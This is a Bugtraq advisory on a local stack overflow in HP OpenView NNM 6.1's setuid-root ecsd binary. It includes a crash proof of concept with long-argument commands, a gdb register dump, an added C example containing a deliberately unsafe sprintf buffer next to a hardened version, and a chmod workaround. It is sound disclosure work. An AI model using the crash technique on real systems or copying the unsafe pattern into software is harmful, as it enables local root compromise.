Bugtraq mailing list archives

HP OpenView NNM v6.1 buffer overflow


From: Jonas Eriksson <je () sekure net>
Date: Wed, 23 May 2001 18:00:57 +0200 (CEST)


The problem..

HP OpenView NNM v6.1 has a buffer overflow in the setuid-root binary ecsd,
installed in /opt/OV/bin/. An overly long argument to its -restore_config
option overruns a stack buffer, and because the binary runs as root, a local
user can use it to gain root privileges.

ecsd is not used by NNM, but it is shipped and installed setuid-root by default.


Details..

je@openview~> uname -a
SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
je@openview~> ls -la /opt/OV/bin/ecsd
-r-sr-xr-x   1 root     bin    2953640 maj 18 11:20 /opt/OV/bin/ecsd
je@openview~> pwd
/
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
Failed to restore engine
configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
Segmentation fault (core dumped)
je@openview~> gdb /opt/OV/bin/ecsd --core=core
[snip..]
Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
[snip..]
#0  0x28eb8 in main ()
(gdb) inf reg
[snip..]
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41410028       1094778920
[snip..]
(gdb)
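The register values above are what a stack overrun looks like on SPARC: the caller's register window (%l0-%l7, %i0-%i7) is saved on the stack at the callee's %fp, so a local buffer that is overrun walks up into it, and main() comes back with its %l and %i registers, and part of %fp, replaced by the attacker's bytes; the saved %i7 (return address) sits just past %fp. The C below is an added example, not ecsd's source. It shows the kind of code that produces this crash (a path built from the current directory and the argument into a fixed stack buffer, which the "//AAAA..." message suggests) next to a hardened version that rejects a too-long argument instead of overflowing or silently truncating. The buffer size, the function names, the cwd/argument layout and the return conventions are all assumptions.

```c
/*
 * Added example (not ecsd's code): the "cwd + '/' + argument" path-building
 * pattern written the unsafe way and the safe way. CFG_PATH_MAX, the function
 * names and the layout are assumptions; ecsd's real buffer size is unknown.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define CFG_PATH_MAX 256        /* assumed fixed buffer size */

/*
 * Unsafe: sprintf() into a fixed stack buffer with no length check.
 * Any name longer than CFG_PATH_MAX - strlen(cwd) - 2 runs past 'path'.
 * On SPARC the excess lands in the caller's saved register window at this
 * function's %fp, which is how main()'s %l and %i registers end up holding
 * 0x41414141 in the gdb dump. Kept only for comparison: never call it with
 * a long or untrusted name.
 */
int build_config_path_unsafe(char *out, const char *cwd, const char *name)
{
    char path[CFG_PATH_MAX];
    sprintf(path, "%s/%s", cwd, name);     /* unbounded write into path[] */
    strcpy(out, path);                      /* and the caller's buffer is trusted blindly */
    return 0;
}

/* Bytes the unsafe version writes into path[] (NUL included), so the overflow
 * boundary can be shown without triggering it. */
size_t unsafe_bytes_written(const char *cwd, const char *name)
{
    return strlen(cwd) + 1 + strlen(name) + 1;
}

/*
 * Hardened: snprintf() bounded by the destination size, plus an explicit
 * truncation check. Silent truncation is not acceptable in a setuid program
 * either, since it would make ecsd open a different file than the one named.
 * Returns 0 on success, -1 with errno = ENAMETOOLONG if the path does not fit.
 */
int build_config_path_safe(char *out, size_t outsz, const char *cwd, const char *name)
{
    int n = snprintf(out, outsz, "%s/%s", cwd, name);
    if (n < 0)
        return -1;                          /* snprintf failed */
    if ((size_t)n >= outsz) {
        errno = ENAMETOOLONG;               /* n+1 bytes needed, outsz available */
        return -1;
    }
    return 0;
}

/* A run of n 'A's, the C equivalent of perl -e 'print "A"x313' above. */
void fill_pattern(char *buf, size_t n)
{
    memset(buf, 'A', n);
    buf[n] = '\0';
}

/* 1 if the hardened builder accepts a name of n A's with cwd "/", else 0.
 * Mirrors the 312/313 probing in the report, against the assumed buffer. */
int safe_accepts_length(size_t n)
{
    char name[1024];
    char out[CFG_PATH_MAX];
    if (n >= sizeof name)
        return 0;
    fill_pattern(name, n);
    return build_config_path_safe(out, sizeof out, "/", name) == 0;
}

int main(void)
{
    char name[400];
    char out[CFG_PATH_MAX];

    fill_pattern(name, 16);                 /* short: both versions agree */
    build_config_path_unsafe(out, "/", name);
    printf("unsafe, short name: %s\n", out);

    fill_pattern(name, 313);                /* the length that crashed ecsd */
    printf("unsafe version would write %zu bytes into a %d-byte buffer\n",
           unsafe_bytes_written("/", name), CFG_PATH_MAX);
    if (build_config_path_safe(out, sizeof out, "/", name) < 0)
        perror("safe version rejected the argument");
    return 0;
}
```

With cwd "/" the hardened version accepts names up to 253 bytes (1 + 1 + 253 + NUL = 256) and refuses 254 and longer with ENAMETOOLONG; the unsafe one keeps writing, and how far past the frame it gets is exactly what the 312/313 probe in the report was measuring.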


Vendor Status..

Hewlett-Packard has been contacted and is currently working on patches
for this vulnerability.


Workaround..

chmod -s /opt/OV/bin/ecsd

This removes the setuid bit from /opt/OV/bin/ecsd, so anyone who triggers
the overflow runs ecsd with their own privileges and gains nothing. Check
afterwards with ls -l that the mode no longer shows an s in the owner's
execute position (-r-xr-xr-x instead of -r-sr-xr-x), and check again after
installing vendor patches or reinstalling NNM, since an update can restore
the original permissions.


Regards
Jonas Eriksson

